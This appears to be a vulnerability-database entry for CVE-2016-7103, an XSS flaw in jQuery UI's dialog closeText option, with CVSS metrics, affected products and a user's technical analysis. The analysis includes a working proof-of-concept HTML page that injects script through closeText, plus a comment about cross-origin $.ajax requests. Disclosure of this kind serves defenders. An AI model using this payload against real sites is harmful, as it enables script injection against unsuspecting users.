Attacker Value
Low
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Network
3

CVE-2016-7103

Disclosure Date: March 15, 2017
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Defense Evasion
Techniques
Validation
Validated
Discovery
Techniques
Validation
Validated
Validated
Validated
Validated
Execution
Techniques
Validation
Validated
Validated
Initial Access
Techniques
Validation
Validated

Description

Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.

Add Assessment

2
Ratings
Technical Analysis

PoC:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>XSS in closeText option of component ui dialog</title>

<script src="https://code.jquery.com/jquery-2.1.4.js"></script>
<script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css">


<script>

$(document).ready(function ()

   {
    $('#dialog').dialog({ closeText: '<script>alert("XSS")<\/script>' });      // This is the attack point where you can inject code 

// if the CORS/CSP policy is not configured or setup wrong, try an jQuery vuln using $.ajax(’https://www.msn.com/robots.txt’);
// if it says onready:1 expand it you should see msn.com’s robots file
// this is a doublewammy of vulnerability in the target

   }
                );
</script>

</head>
<body>

<div id="dialog" title="Dialog Title">Content here!</div>

</body>
</html>

Positives: Easy, can potentially execute scripts off remote sites
Negatives: Would likely require user intervention social engineer or phishing to make this persistant or of real use

Document on how the dialog function is used in jQuery – https://www.tutorialspoint.com/jqueryui/jqueryui_dialog.htm

Here is a link to a site that will prove which jquery exploits are vuln. to which version (specific to jQuery not UI) – https://research.insecurelabs.org/jquery/test/
More info on exploit and poc: https://vuldb.com/?id.98137

dj substance
https://tranceattic.com

CVSS V3 Severity and Metrics
Base Score:
6.1 Medium
Impact Score:
2.7
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Changed
Confidentiality (C):
Low
Integrity (I):
Low
Availability (A):
None

General Information

Vendors

  • debian,
  • fedoraproject,
  • jqueryui,
  • juniper,
  • netapp,
  • oracle,
  • redhat

Products

  • application express,
  • business intelligence 12.2.1.3.0,
  • business intelligence 12.2.1.4.0,
  • debian linux 9.0,
  • fedora 30,
  • fedora 35,
  • fedora 36,
  • hospitality cruise fleet management 9.0.11,
  • jquery ui,
  • junos 21.2,
  • openstack 7.0,
  • openstack 8,
  • openstack 9,
  • oss support tools,
  • oss support tools 2.12.42,
  • primavera unifier,
  • siebel ui framework,
  • snapcenter -,
  • weblogic server 10.3.6.0.0,
  • weblogic server 12.1.3.0.0,
  • weblogic server 12.2.1.3.0

Exploited in the Wild

Reported by:

References

Advisory
Miscellaneous

Additional Info

Technical Analysis